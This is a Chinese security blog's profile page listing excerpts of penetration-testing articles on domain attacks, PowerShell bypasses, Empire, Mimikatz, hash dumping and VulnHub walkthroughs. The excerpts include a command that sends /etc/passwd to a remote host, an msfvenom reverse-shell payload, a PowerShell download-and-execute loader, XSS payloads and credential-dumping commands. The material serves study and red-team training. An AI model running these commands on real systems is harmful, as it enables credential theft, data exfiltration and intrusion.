weixin_41082546的博客

私信 关注
Micr067
码龄3年

个人博客:https://www.payload.com.cn

  • 34,120
    被访问量
  • 104
    原创文章
  • 132,356
    作者排名
  • 32
    粉丝数量
  • 于 2017-11-16 加入CSDN
获得成就
  • 获得12次点赞
  • 内容获得6次评论
  • 获得127次收藏
荣誉勋章
兴趣领域
  • #运维
    #安全
TA的专栏
  • 内网渗透
    20篇
  • 漏洞复现
    2篇
  • web安全
    2篇
  • powershell
    5篇
  • 其他杂类
    2篇
  • 无线安全
    3篇
  • Cobalt Strike
  • 靶机渗透
    4篇
  • 提权
    1篇
  • 域渗透
    13篇
  • 最近
  • 文章
  • 资源
  • 问答
  • 课程
  • 帖子
  • 收藏
  • 关注/订阅

RedCore红队研发从入门到精通之书籍推荐篇(密码RedCore).pdf

RedCore红队研发从入门到精通之书籍推荐篇(密码RedCore)
pdf
发布资源于 2 月前

Cobalt Strike 4.2 Manual.pdf

Cobalt Strike 4.2 手册,英文版的,没有汉化
pdf
发布资源于 2 月前

DC6 靶机渗透

靶场下载链接:Download: http://www.five86.com/downloads/DC-6.zip Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip Download (Torrent): https://download.vulnhub.com/dc/DC-6.zip.torrent ( Magnet...
原创
211阅读
0评论
0点赞
发布博客于 2 年前

活动目录使用备忘单

活动目录使用备忘单包含 Windows 活动目录的常见枚举和攻击方法的备忘单。工具Powersploit PowerUpSQL Powermad Impacket Mimikatz Rubeus- >编译版本 BloodHound AD Module ASREPRoast枚举使用 PowerView 获取当前域:Get-NetDomain Enum 其他域:Get-NetDomain -Domain <DomainName> ...
翻译
79阅读
0评论
0点赞
发布博客于 8 月前

SSTI-服务端模板注入漏洞

原理:服务端模板注入与SQL注入的成因一样,也是服务端接收了用户的输入,将其作为 Web 应用模板内容的一部分,在进行目标编译渲染的过程中,执行了用户插入的恶意内容,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。模板引擎模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的HTML文档。参考:https://baike.baidu.co.
原创
439阅读
0评论
0点赞
发布博客于 9 月前

powershell代码混淆绕过

目前大多数攻击者已经将PowerShell 利用在了各种攻击场景中,如内网渗透,APT攻击甚至包括现在流行的勒索软件中。powershell的功能强大且调用方式十分灵活。1. cmd启动powershell首先看看powershel使用cmd.exe启动执行代码的方式:1.1 常规方法cmd.exe /c "powershell -c Write-Host SUCCESS -Fore Green"cmd.exe /c "echo Write-Host SUCCESS -Fore G.
原创
605阅读
0评论
0点赞
发布博客于 9 月前

绕过PowerShell执行策略的方法总结

默认情况下,PowerShell配置为阻止Windows系统上执行PowerShell脚本。对于渗透测试人员,系统管理员和开发人员而言,这可能是一个障碍,但并非必须如此。什么是PowerShell执行策略?PowerShell execution policy 是用来决定哪些类型的PowerShell脚本可以在系统中运行。默认情况下,它是“Restricted”(限制)的。然而,这个设置从来没有算是一种安全控制。相反,它会阻碍管理员操作。这就是为什么我们有这么多绕过它的方法。为什么我..
原创
238阅读
0评论
0点赞
发布博客于 9 月前

Ubuntu使用国内源安装指定Docker版本

使用Kubernetes1.15.1搭建集群时发现最高支持docker18.09,而我节点上的docker版本是19.03.1,所以需要更换一下docker版本1.卸载原有版本sudo apt-get remove docker docker-engine docker-ce docker.io如果需要删除所有镜像,容器和卷(第一次安装请忽略):sudo rm -rf /var/lib/docker备注:apt-get remove会保留软件的配置文件如果想删除请执行以下操作查看相关软件
转载
165阅读
0评论
0点赞
发布博客于 9 月前

检测并移除WMI持久化后门

WMI型后门只能由具有管理员权限的用户运行。WMI后门通常使用powershell编写的,可以直接从新的WMI属性中读取和执行后门代码,给代码加密。通过这种方式攻击者会在系统中安装一个持久性的后门,且不会在磁盘中留下任何文件。  WMI型后门主要有两个特征:无文件和无进程。其基本原理是:将代码加密存储在WMI中,达到所谓的无文件;当设定的条件满足时,系统将自动启动powershell进程去执行...
原创
265阅读
0评论
0点赞
发布博客于 1 年前

域控制器DSRM账户安全防护

一、DSRM简介   1.DSRM(Diretcory Service Restore Mode,目录服务恢复模式)是windows域环境中域控制器的安全模式启动选项。域控制器的本地管理员账户也就是DSRM账户,DSRM密码是在DC创建时设置的,一般很少更改。DSRM的用途是:允许管理员在域环境出现故障时还原、修复、重建活动目录数据库。通过在DC上运行ntdsutil 工具可以修改DSRM密码...
原创
259阅读
0评论
0点赞
发布博客于 1 年前

AD域SSP安全防护

一、简介  SSP(Security Support Provider)是windows操作系统安全机制的提供者。简单的说,SSP就是DLL文件,主要用于windows操作系统的身份认证功能,例如NTLM、Kerberos、Negotiate、Secure Channel(Schannel)、Digest、Credential(CredSSP)。  SSPI(Security Suppor...
原创
234阅读
0评论
0点赞
发布博客于 1 年前

SID History域权限维持

一、简介  每个用户都有自己的SID,SID的作用主要是跟踪安全主体控制用户连接资源时的访问权限,SID History是在域迁移过程中需要使用的一个属性。  如果A域中的域用户迁移到B域中,那么该用户的SID值就会改变,进而其权限也会改变。导致迁移后的用户无法访问以前可以访问的资源。SID History的作用是在域迁移过程中保持域用户的访问权限,如果迁移后用户的SID值改变,系统会将原...
原创
210阅读
0评论
0点赞
发布博客于 1 年前

linux 下 go 语言环境搭建

1.首先去官网下载安装包https://studygolang.com/dl选择合适的安装包并下载解压wget https://studygolang.com/dl/golang/go1.13.8.linux-amd64.tar.gztar -zxvf go1.13.8.linux-amd64.tar.gz然后将go文件夹复制到 /usr/lo...
原创
79阅读
0评论
0点赞
发布博客于 1 年前

使用批处理管理域控制器

1、AD活动目录的优点:-集中管理:对象主要是用户和计算机。-便捷的网络资源访问:用户登录域中任意一台计算机都可以访问域中的资源。-可扩展性:Ecchange服务器集中管理:-用户:用户描述、部门、邮件地址、电话和住址等。-联系人:所在公司的名称和地址、邮件地址、传真等。2.管理AD中的计算机、组合OU```@echo offtitle 批处理管理AD中的计算机、组...
原创
202阅读
0评论
0点赞
发布博客于 1 年前

无线安全安全基础

一、无线网络基础  无线网络的搭建比较简单,只需要一个无线路由器即可实现。无线网络环境中,数据是以广播包形式传输,因此引起了无线网络的安全问题。尽管路由器中提供了各种加密方式来保护数据的安全。但是由于加密算法存在漏洞可以将其密码破解出来。1.1、无线网络构成  无线网络是采用无线通信技术实现的网络。无线网络既包括允许允许用户建立具有无线连接的全球语音和数据网络,也包括为近距离...
原创
360阅读
0评论
2点赞
发布博客于 1 年前

Aircrack-ng无线审计工具使用

Aircrack-ng工具  Aircrack-ng是一个与802.11标准的无线网络分析的安全软件,主要功能有网络探测、数据包嗅探捕获、WEP和WPA/WPA2-PSK破解。Aircrack可以工作在任何支撑监听模式的无线网卡上,并嗅探802.11a、802.11b、802.11g的数据包。1.1、Aircrack-ng工具集  Aircrack-ng是一个包含了多款工具的无线...
原创
173阅读
0评论
0点赞
发布博客于 1 年前

Aireplay-ng 6 种常用攻击模式详解

reaver爆破WPS PIN码:  airodump-ng wlan0  reaver -i wlan0 -b D0:76:E7:51:2A:78 -vvmacchanger更改MAC地址:  macchanger -r wlan0  -r:随机更换MAC  -m:设置指定的MAC地址  macchanger -m 72:8e:9c:2d:a8:bb wl...
原创
238阅读
0评论
1点赞
发布博客于 1 年前

命令注入绕过技巧总结

命令注入绕过技巧总结命令注入是一个安全漏洞,它使攻击者可以在易受攻击的应用程序中执行任意命令。基本命令root@micr067:~# cat /etc/passwdroot:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin...
原创
538阅读
0评论
1点赞
发布博客于 1 年前

2020年3月1日正式实施的28项网络信息安全规范.rar

2020年3月1日正式实施的28项网络信息安全规范。包括网络信息内容治理规定、信息安全技术(操作系统安全技术要求、网络安全等级保护实施、工业控制系统产品信息 安全通用评估准则、数据库管理系统安全评估准则、数据库管理系统安全技术要求、数据安全能力成熟度模型)。
rar
发布资源于 1 年前

《将博客搬至CSDN》

《将博客搬至CSDN》
原创
26阅读
0评论
0点赞
发布博客于 1 年前

使用卷影拷贝提取ntds.dit

一、简介  通常情况下,即使拥有管理员权限,也无法读取域控制器中的C:\Windows\NTDS
tds.dit文件。使用windows本地卷影拷贝服务,就可以获得该文件的副本。  在活动目录中,所有的数据都保存在ntds.dit中。ntds.dit是一个二进制文件,存储位置为域控制器的%SystemRoot%
tds
tds.dit。ntds.dit中包含用户名、散列值、组、GPP...
原创
482阅读
0评论
0点赞
发布博客于 1 年前

导出ntds.dit中的散列值

1.下载NTDSXhttp://www.ntdsxtract.comgit clonehttps://github.com/csababarta/ntdsxtract安装python setup.py build && python setup.py install将导出的ntds.dit.export 文件夹中的datatable.3和link_table....
原创
153阅读
0评论
0点赞
发布博客于 1 年前

Exchange2010安装指南

安装流程参考下面的:https://jingyan.baidu.com/article/2c8c281d6893680008252a9c.htmlhttps://blog.csdn.net/StevenKind/article/details/86526622安装环境:windows server 2008(已安装Active Diretcory服务)1、安装域控制器2、安装n...
原创
41阅读
0评论
0点赞
发布博客于 1 年前

Exchange邮件服务器安全

Exchange是由微软推出的用于企业环境中部署的邮件服务器。Exchange在逻辑上分为三个层次:网络层(network layer)、目录层(directory layer)、消息层(messaging layer),服务器角色正是在消息层上的一个细分。Exchange Server 2010包含五个服务器角色,分别是邮箱服务器(mailbox server)、集线传输服务器(hub tran...
原创
93阅读
0评论
1点赞
发布博客于 1 年前

RAR、7-Zip在命令行下对数据进行压缩

3.6.1 RARWinrar的命令行模式程序在安装目录下的 rar.exe (打包压缩程序),unrar.exe(解压缩程序)RAR.exe的常用参数如下:  -a   添加文件到压缩文件  -k   锁定压缩文件  -s   生成存档文件(这样可以提高压缩比)  -p   指定压缩密码  -r   递归压缩,包括子目录  -x   指定要排除的文件  ...
原创
198阅读
0评论
0点赞
发布博客于 1 年前

防范明文密码和散列值抓取

一、单机密码抓取的防范方法  微软为了防止用户密码在内存中以明文形式泄露,发不了补丁KB2871997,关闭了Wdigest功能。windows server 2012以上版本默认关闭Wdigest,使攻击者无法从内存中获取明文密码。对于win server 2012以下版本,通过安装KB2871997补丁,可以避免攻击者获取明文密码。  通过查看注册表键值,可以判断Wdigest功能状态...
原创
443阅读
0评论
0点赞
发布博客于 1 年前

Halo-个人独立博客系统

Halo-个人独立博客系统项目地址:https://github.com/halo-dev/halo安装指导:https://halo.run/guide/简介:Halo 是一款现代化的个人独立博客系统,给习惯写博客的同学多一个选择。Halo [ˈheɪloʊ],意为光环。当然,你也可以当成拼音读(哈喽)。轻快,简洁,功能强大,使用 Java 开发的博客系统。快速安装下载最新...
原创
1749阅读
0评论
1点赞
发布博客于 1 年前

各种反弹shell方法总结备忘

各种反弹shell方法总结shell分为两种,一种是正向shell,另一种是反向shell。如果客户端连接服务器,客户端主动连接服务器,就称为正向shell。如果客户端连接服务器,服务器想要获得客户端的shell,就称为反向shell。反向shell通常在开启了防护措施的目标机器上,例如防火墙、端口转发等。(1)正向shell输入如下命令,监听目标主机的4444端口nc -lvp ...
原创
329阅读
0评论
1点赞
发布博客于 1 年前

monowall.rar

m0n0wall 是一个完整的、嵌入式的防火墙软件包,该软件包可以安装于嵌入式PC里。m0n0wall基于bare-bones version of FreeBSD,包括一个WEB服务器,PHP和另一些工具软件。整个系统的配置保存在一个XML文件当中。m0n0wall可能是第一个启动时通过PHP配置的UNIX系统。m0n0wall编写者认为m0n0wall不包含在第3层 和第4层防火墙的基础服务外的任何功能。因为m0n0wall是嵌入式的防火墙面向嵌入设备有限的CPU资源和记忆体资源。m0n0wall不允许登录: 在控制台没有登录提示符,(它被一个功能菜单代替) ,没有任何Telnet或SSH守护程序。
rar
发布资源于 2 年前

内网渗透之域渗透

1.初识域环境什么是域域是计算机网络的一种形式,其中所有用户帐户 ,计算机,打印机和其他安全主体都在位于称为域控制器的一个或多个中央计算机集群上的中央数据库中注册。 身份验证在域控制器上进行。 在域中使用计算机的每个人都会收到一个唯一的用户帐户,然后可以为该帐户分配对该域内资源的访问权限。 域(Domain)是将网络中多台计算机逻辑上组织到一起,进行集中管理,这种区别于工作组的逻辑环境叫...
原创
393阅读
0评论
1点赞
发布博客于 2 年前

CA证书安装以及sslh协议转发

1.安装CA证书生成一个证书文件http://127.0.0.1/certsrv/ 申请证书选择高级证书申请将之前生成的base64证书文件内容贴进来ok,完成挂起的申请—所有任务—颁发在颁发的证书中可以看到我们已经申请好 的证书。访问http://127.0.0.1/certsrv/查看挂起的证书申请的状态这张证书包含所有...
原创
38阅读
0评论
0点赞
发布博客于 2 年前

ssh 端口转发

ssh本地端口转发(1)SSH 支持双向通信隧道将其他 TCP 端口的通信通过 SSH 链接来转发用 SSH 作为传输协议,对流量自动加解密突破防火墙访问规则的限制,可用于翻墙(2)SSH 本地端口转发使效果类似于 rinetd将一本地端口与远程服务器建立隧道(3)建立双向安全隧道将其他 TCP 端口的通信通过 SSH 链接来转发用 SSH 作为传输协议,对流量自动加解密...
原创
31阅读
0评论
0点赞
发布博客于 2 年前

linux下无回显可将回显发送到服务器

nc -lvvp 7080 开启侦听cancel -u “$(cat /etc/passwd)” -h 192.168.0.101:3321 在靶机上执行命令攻击机成功接收到靶机发送信息。
原创
43阅读
0评论
0点赞
发布博客于 2 年前

免杀工具汇总

今天整理以前的笔记,把这部分工具整理了一下,虽然没有白利用稳,但这些工具也能在一定程度起到一定的免杀作用。DKMC项目地址:https://github.com/Mr-Un1k0d3r/DKMC可以创建一个 outputs 文件夹 存放 shellcode启动python dkmc.py操作顺序:Sc :是将 msf 生成的 raw 文件转换位 shellcode 代码...
原创
2387阅读
0评论
1点赞
发布博客于 2 年前

wireshark图像化与命令行模式

1.筛选器ip.addr==192.168.88.160 and tcp.port==80!tcp 查看分tcp的协议frame.len<=150 查看长度小于等于150字节的数据包捕获tcp中带有psh和ack标志偏移位为13的的数据包tcp[13]==0x18将常用筛选条件到添加删选器分析–》显示过滤器–》+添加2.wireshark 使用表格3....
原创
91阅读
0评论
0点赞
发布博客于 2 年前

本地密码提取工具-LaZagne

简介:LaZagne项目是用于开源应用程序获取大量的密码存储在本地计算机上。每个软件都使用不同的技术(纯文本,API,自定义算法,数据库等)存储其密码。开发该工具的目的是为最常用的软件找到这些密码。该项目已作为开发后模块添加到pupy中。Python代码将在不接触磁盘的情况下在内存中进行解释,并且可以在Windows和Linux主机上运行。项目地址:https://github.c...
原创
550阅读
0评论
0点赞
发布博客于 2 年前

xss实体绕过示例

知识点:倘若是在script、input标签当中,即可突破。Payload‘ oninput=alert`1` // 当要在input中输入内容时触发事件‘ oninput=alert`1` ‘ 同上‘ onchange=alert`1` // 发生改变的时候触发该事件‘ onchange=alert`1` ‘ 同上在script里直接alert示例:首选...
原创
338阅读
0评论
0点赞
发布博客于 2 年前

使用 EW 作Socks5进行内网穿透

简介:EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。 主页: http://rootkiter.com/EarthWorm/ew项目地址:https://github.com/idlefire/ew【使用场景】普通网络环境:1. 目标网络边界存在公网IP且可任意开监听端口:a)...
原创
571阅读
0评论
0点赞
发布博客于 2 年前

PowerShell攻击:nishang

nishanhg下载地址:https://github.com/samratashok/nishing1.简介nishang的使用是要在PowerShell 3.0以上的环境中才可以正常使用。也就是说win7下是有点小问题的。因为win7下自带的环境是PowerShell 2.02.环境准备查看powershell版本get-host 或者 $PSVersionTable.P...
原创
172阅读
0评论
0点赞
发布博客于 2 年前

PowerShell渗透--Empire(三)

PowerShell渗透--Empire(三)会话注入我们可以使用usemodule management/psinject模块来进程注入,获取权限设置下Listeners和ProcID这2个参数,这里的ProcID就是之前的CMD的pid,反弹回域用户权限shellusemodule management/psinjectset Listener Micr067set...
原创
97阅读
0评论
0点赞
发布博客于 2 年前

PowerShell渗透--Empire(二)

PowerShell渗透--Empire(二)权限提升 Bypass UAC usemodule powershell/privesc/bypassuac 设置listener execute list查看 usemodule powershell/private/bypassuac_wscript (win7) ...
原创
106阅读
1评论
0点赞
发布博客于 2 年前

PowerShell渗透--Empire

0x00 简介Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架代码具有从stager生成,提权到渗透维持的一系列功能,无需powershell.exe就可以使用powershell的代理功能还可以快速在后期部署漏洞利用模块,内置模块有键盘记录,Mimikatz,绕过UAC,内网扫描等,可以躲避网络检测和大部分安全防护工具,类似于Meterpre...
原创
194阅读
1评论
0点赞
发布博客于 2 年前

PowerShell渗透–Empire(三)

会话注入我们可以使用usemodule management/psinject模块来进程注入,获取权限设置下Listeners和ProcID这2个参数,这里的ProcID就是之前的CMD的pid,反弹回域用户权限shellusemodule management/psinjectset Listener Micr067set ProcID 3768execute3.In...
原创
30阅读
0评论
0点赞
发布博客于 2 年前

PowerShell渗透–Empire(二)

权限提升Bypass UACusemodule powershell/privesc/bypassuac设置listenerexecutelist查看usemodule powershell/private/bypassuac_wscript (win7)当运行完提权模块后,back返回agent...
原创
64阅读
0评论
0点赞
发布博客于 2 年前

PowerShell渗透–Empire

0x00 简介Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架代码具有从stager生成,提权到渗透维持的一系列功能,无需powershell.exe就可以使用powershell的代理功能还可以快速在后期部署漏洞利用模块,内置模块有键盘记录,Mimikatz,绕过UAC,内网扫描等,可以躲避网络检测和大部分安全防护工具,类似于Meterp...
原创
33阅读
0评论
0点赞
发布博客于 2 年前

PowerUp攻击模块实战

PowerUp攻击模块实战演练1.将PowerUp.ps1脚本上传至目标服务器,然后在本地执行2.使用IEX在内存中加载此脚本,执行以下命令,脚本将进行所有的检查。powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('C:\PowerUp.ps1'); Invoke-A...
原创
199阅读
0评论
0点赞
发布博客于 2 年前

PowerSploit 用法

PowerSploitPowerSploit是基于PowerShell的后渗透框架,包含很多PowerShell攻击脚本,主要用于渗透中的信息侦查,权限提升,权限维持,github地址为: https://github.com/PowerShellMafia/PowerSploit安装 下载程序目录 git clone https://github.com/PowerShellMa...
原创
388阅读
1评论
1点赞
发布博客于 2 年前

powershell 基础

Windows powershell是一种命令行外壳程序和脚本环境,它内置在win7以上版本的操作系统中,使命令行用户和脚本编写者可以利用.NET Framework的强大功能。powershell程序可以直接在内存中运行,可以作为命令提示符cmd.exe的扩充。查看powershell版本信息Get-Host 或者 $PSVersionTable.PSVersion基...
原创
59阅读
0评论
0点赞
发布博客于 2 年前

S2-052 漏洞复现

Structs2框架已知的漏洞编号如下:S2-005 S2-009 S2-016 (含S2-013) S2-019 S2-020 S2-021 S2-032 S2-037(含S2-033) DevMode S2-045 S2-046 S2-048 S2-052 S2-055 S2-057S2-052(CVE-2017-9805)环境:https://gi...
原创
330阅读
0评论
0点赞
发布博客于 2 年前

所有过往,皆为序章

有时一时的消沉不算什么,长时间的低谷也不算什么,因为人只有站在高处时才有向下的权利。而往往下到最底时又会触底反弹,只要能够挺过一时,那未来皆是明媚向上的大路。2019.10.3轻缅 ...
原创
36阅读
0评论
0点赞
发布博客于 2 年前

Weblogic任意文件上传漏洞(CVE-2018-2894)复现

使用docker搭建漏洞测试环境micr067@test:~/vulhub/weblogic/CVE-2018-2894$ sudo docker-compose buildweblogic uses an image, skippingmicr067@test:~/vulhub/weblogic/CVE-2018-2894$ sudo docker-compose up -d...
原创
204阅读
0评论
0点赞
发布博客于 2 年前

Moonraker 靶机渗透

0x01 简介攻击Moonraker系统并且找出存在最大的威胁漏洞,通过最大威胁漏洞攻击目标靶机系统并进行提权获取系统中root目录下的flag信息。Moonraker: 1镜像下载地址:http://drive.google.com/open?id=13b2ewq5yqre2UbkLxZ58uHtLfk-SHvmA0x02 信息搜集1.获取目标ip地址,使用netd...
原创
216阅读
0评论
0点赞
发布博客于 2 年前

FourAndSix2 靶机渗透

0x01 简介FourAndSix2是易受攻击的一个靶机,主要任务是通过入侵进入到目标靶机系统然后提权,并在root目录中并读取flag.tx信息FourAndSix2.镜像下载地址:https://download.vulnhub.com/fourandsix/FourAndSix2.ova0x02 信息收集1.通过存活主机发现,确定目标机器IP2.端口扫描发现3.发现...
原创
30阅读
1评论
0点赞
发布博客于 2 年前

使用ctftool测试CTF协议

0x01 简介2019年8月13日谷歌披露了影响所有Windows版本的20年未修补漏洞。来自Google的Project Zero团队的Tavis Ormandy 发现,由于此交互没有访问控制或任何类型的身份验证,因此任何应用程序,任何用户甚至沙盒流程都可以实现以下操作:在所有会话中连接到ctfmon ALPC端口,从任何其他会话中读取和写入任何窗口的文本,伪造他们的线程I...
原创
60阅读
0评论
0点赞
发布博客于 2 年前

BlackWin改装版!

BlackWin,一款黑客渗透测试系统!下载地址:https://blackwin.ir配置:防火墙策略全开,安装在高速固态硬盘,速度很快很稳定!注:开启防火墙三网(专网、域网、公网)出入,可以提升虚拟机运行速度。建议:建议直接安装在主机上,BlackWin包含常用的办公套件,完全可以满足日常使用。优化:可以将个人工具集移植到BlackWin,打造属于自己的渗透测试系统。 ...
原创
270阅读
0评论
0点赞
发布博客于 2 年前

Empire – PowerShell后渗透攻击框架

0x01 简介Empire是一个后渗透攻击框架。它是一个纯粹的PowerShell代理,具有加密安全通信和灵活架构的附加功能。Empire具有在不需要PowerShell.exe的情况下执行PowerShell代理的方法。它可以迅速采用可后期利用的模块,涵盖范围广泛,从键盘记录器到mimikatz等。这个框架是PowerShell Empire和Python Empire项目的组合; 这使得它...
原创
103阅读
0评论
0点赞
发布博客于 2 年前

cve_2019_0708 bluekeep复现踩坑

0X01 简介Microsoft Windows是美国微软公司发布的视窗操作系统。远程桌面连接是微软从Windows 2000 Server开始提供的功能组件。2019年5月14日,微软发布了月度安全更新补丁,修复了远程桌面协议(RDP)远程代码执行漏洞。未经身份验证的攻击者利用该漏洞,向目标 Windows主机发送恶意构造请求,可以在目标系统上执行任意代码。近日,Metasploit发布了该...
原创
720阅读
0评论
0点赞
发布博客于 2 年前

cve_2019_0708复现踩坑

0X01 简介Microsoft Windows是美国微软公司发布的视窗操作系统。远程桌面连接是微软从Windows 2000 Server开始提供的功能组件。2019年5月14日,微软发布了月度安全更新补丁,修复了远程桌面协议(RDP)远程代码执行漏洞。未经身份验证的攻击者利用该漏洞,向目标 Windows主机发送恶意构造请求,可以在目标系统上执行任意代码。近日,Metasploit发...
原创
114阅读
0评论
0点赞
发布博客于 2 年前

配置安卓模拟器全局代理

工具:proxifier目前很多安卓客户端会设置多种方式来验证客户端是否使用了代理,来防止抓包比如:1.检查客户端是否使用了代理,如果使用了代理,客户端就不再发送网络请求2.通过Okhttp设置默认代理3.使用okhttp实现SSL双向认证如果在APP请求网络之前先判断下手机网络是否使用了代理,如果使用了代理就不请求接口,那么我们就无法抓取数据包进行分析了。设置全局代理客...
原创
442阅读
0评论
0点赞
发布博客于 2 年前

About

《博客园》https://www.cnblogs.com/micr067/《CSDN博客》https://blog.csdn.net/weixin_4108254《github Hexo》https://www.payload.net.cn/似乎我在这条道路上有着用不完的激情,接下来的日子里,生死未卜~ ...
原创
12阅读
0评论
0点赞
发布博客于 2 年前

域渗透-LSA Protection

简介:微软在 2014 年 3 月 12 日添加了 LSA 保护策略,用来防止对进程 lsass.exe 的代码注入,这样一来就无法使用 mimikatz 对 lsass.exe 进行注入,相关操作也会失败。微软官方文档:https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012...
原创
212阅读
0评论
0点赞
发布博客于 2 年前

Mimikatz on meterpreter

实验环境:kali 主机:192.168.88.193目标靶机:win2008 R2 192.168.88.130kali 主机上执行生成一个后门 exe:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.193 LPORT=443 -f exe -o notepad.exemsfconsole -r ...
原创
72阅读
0评论
0点赞
发布博客于 2 年前

Cobalt_Strike扩展插件

https://github.com/harleyQu1nn/AggressorScriptshttps://github.com/bluscreenofjeff/AggressorScriptshttps://github.com/michalkoczwara/aggressor_scripts_collectionhttps://github.com/vysecurity/Aggress...
原创
1622阅读
0评论
0点赞
发布博客于 2 年前

MSF 下域内渗透

MSF 下域内渗透实战先获取域内机器sessionrun get_local_subnets //获取本地网络子网掩码route add 192.168.233.0 255.255.255.0 1 //添加路由表run autoroute -s 192.168.2.0 -n 255.255.255.0 //也可以添加一条静态路由run autoroute -s 192.168....
原创
204阅读
0评论
0点赞
发布博客于 2 年前

ntds.dit和SSP权限维持

Kerberos认证工作原理https://www.cnblogs.com/huamingao/p/7267423.html5.获取访问活动目录数据库文件的权限(ntds.dit)前提条件是获取域控权限:1.通过备份路径(备份服务器储存,媒体,网络共享)2 在准备配置成域控的服务器上找 NTDS.dit 文件3. 有虚拟机的管理权限,就能克隆虚拟的域控并离线获取数据4. 用 ...
原创
145阅读
0评论
0点赞
发布博客于 2 年前

3-pass the ticket

pass the ticket在域环境中,Kerberos协议被用来作身份认证,这里仅介绍几个名词:KDC(Key Distribution Center): 密钥分发中心,里面包含两个服务:AS和TGSAS(Authentication Server): 身份认证服务TGS(Ticket Granting Server): 票据授予服务TGT(Ticket Granting T...
原创
43阅读
0评论
0点赞
发布博客于 2 年前

2.域内渗透工具

1、抓取域 hash 密码vsssown.vbs、vshadow.exe、ntdsdump.exe、 mimikatz 等2、hash 注入wce 直接获取到域登录的 hash 值:wce.exe >hash.txtwce.exe -l // 列出登录的会话和NTLM凭据(默认值)wce.exe -w // 读取lsa明文密码wce的使用说明如下:-l 列出登录的会...
原创
188阅读
0评论
0点赞
发布博客于 2 年前

1.域渗透基础

一、域渗透基础1.域控:win server 20082.域内DC:win server 2008、win server 20033.域内PC:win7 x64、win7 x32、win xp1.域渗透基本命令ipconfig /all // 查询ip段,所在域等。net user // 本机用户列表net localgroup administrators // 本机管...
原创
58阅读
0评论
0点赞
发布博客于 2 年前

frp实现内网穿透

项目地址:https://github.com/fatedier/frp/releases下载对应版本程序wget https://github.com/fatedier/frp/releases/download/v0.27.0/frp_0.27.0_linux_amd64.tar.gz解压rm -rf frpc*编辑frps配置文件vim frps.ini[co...
原创
56阅读
0评论
0点赞
发布博客于 2 年前

记一次找回win7密码

虚拟机密码忘了。修改启动顺序为CD,设置虚拟机光盘镜像为kali ISO(这里用的是kali 2017.2)。开启按f2进入kali live 模式fdisk -l 查看磁盘分区,找到win7虚拟机所使用的磁盘。mount /dev/sda1 /mnt 挂载完磁盘后需要退出/mnt 目录,重新进入才可以查看挂载的内容,这个在centos上也是这样的。cd 到存放SAM文件的...
原创
18阅读
0评论
0点赞
发布博客于 2 年前

使用kali破解win7密码

虚拟机密码忘了。修改启动顺序为CD,设置虚拟机光盘镜像为kali ISO(这里用的是kali 2017.2)。开启按f2进入kali live 模式fdisk -l 查看磁盘分区,找到win7虚拟机所使用的磁盘。mount /dev/sda1 /mnt 挂载完磁盘后需要退出/mnt 目录,重新进入才可以查看挂载的内容,这个在centos上也是这样的。cd 到存...
原创
1953阅读
0评论
0点赞
发布博客于 2 年前

win server 2008搭建域环境

0x00 简介1.域控:win server 20082.域内服务器:win server 2008、win server 20033.域内PC:win7 x64、win7 x32、win xp0x01.配置静态IP查看IP地址和网关DNS为127.0.0.1,域控安装过程中会默认安装DNS服务。0x02.安装活动目录角色win+R打开运行,输入dcp...
原创
108阅读
1评论
0点赞
发布博客于 2 年前

批量SQL.zip

批量SQL,一款可以实现批量注入的工具,可以快速识别并发现可能存在的注入点。
zip
发布资源于 2 年前

BurpSuite官方说明书.doc

BurpSuite官方说明书,最专业的burpsuite功能及使用说明文档。
doc
发布资源于 2 年前

完整的互联网安全手册 (2019年第2版)一PART1.pdf

2-国家关键信息基础设施应急响应模型 - ZAHRI YUNOS【可公开】.pdf
pdf
发布资源于 2 年前

2-国家关键信息基础设施应急响应模型 - ZAHRI YUNOS【可公开】.pdf

2-国家关键信息基础设施应急响应模型 - ZAHRI YUNOS【可公开】
pdf
发布资源于 2 年前

vulnhub-XXE靶机渗透

下载链接:https://download.vulnhub.com/xxe/XXE.zip0x01 确定目标IP目标网络模式默认为net模式,无需修改使用arp-scan或者netdiscover确定目标iparp-scan -l 或者 netdiscover -i eth1 目标ip为 192.168.88.128探测端口,发现目标机器只开启了80端口访问w...
原创
467阅读
1评论
0点赞
发布博客于 2 年前

XXEinjector.zip

XXEinjector 一款XXE注入测试工具,可以通过命令行快速检测可能存在的XXE漏洞!
zip
发布资源于 2 年前

COBAIT STRIKE

COBAIT STRIKE 3.14破解版:https://download.csdn.net/download/weixin_41082546/11604021客户端攻击重定向设置view —application 查看目标系统日志attack—web-drive-by—site clone在此之前需要先生成一段攻击代码钓鱼邮件实施 的4个阶段...
原创
213阅读
0评论
0点赞
发布博客于 2 年前

linuxprivchecker.py

linuxprivchecker是一款安全检测脚本,可以帮助您了解系统的弱点,从而更好的完善系统。
py
发布资源于 2 年前

CISSP终极指南2019.1.pdf

CISSP终极指南2019.1 可以帮助您了解CISSP,帮助您了解CISSP考试相关内容,从而更好的备考。
pdf
发布资源于 2 年前

LinEnum.zip

LinEnum是一款在linux系统使用的辅助提权脚本,它能够帮助你找到系统的弱点,从而方便提权。
zip
发布资源于 2 年前

御剑RDP爆破工具.rar

御剑RDP爆破工具 御剑系列工具之一,御剑的目录爆破工具一直是安全研究人员的最爱,此款RDP爆破工具实力也不差,速度很快。
rar
发布资源于 2 年前

CTFCrackTools.7z

CTFCrackTools 包括各种编码解码功能,可以满足ctf比赛时编解码任务。。。
7z
发布资源于 2 年前

Raven 2 靶机渗透

